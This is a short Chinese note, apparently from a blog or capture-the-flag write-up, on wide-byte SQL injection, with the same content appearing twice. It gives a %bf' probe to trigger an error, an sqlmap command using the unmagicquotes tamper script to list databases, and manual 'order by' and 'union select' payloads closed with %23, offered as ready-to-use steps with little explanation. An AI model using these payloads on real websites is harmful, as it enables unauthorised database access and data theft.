free:
url?id=1%bf' 报错 存在宽字符注入, 可用脚本 sqlmap -u "" --tamper unmagicquotes.py --dbs 手工注入 %bf' order by N %23 %bf' union select 1,2,3,4,5,6,N%23 正常构造注入 前加%bf' 代码 后加%23
url?id=1%bf' 报错
存在宽字符注入,
可用脚本
sqlmap -u "" --tamper unmagicquotes.py --dbs
手工注入
%bf' order by N %23
%bf' union select 1,2,3,4,5,6,N%23
正常构造注入
前加%bf' 代码 后加%23
评论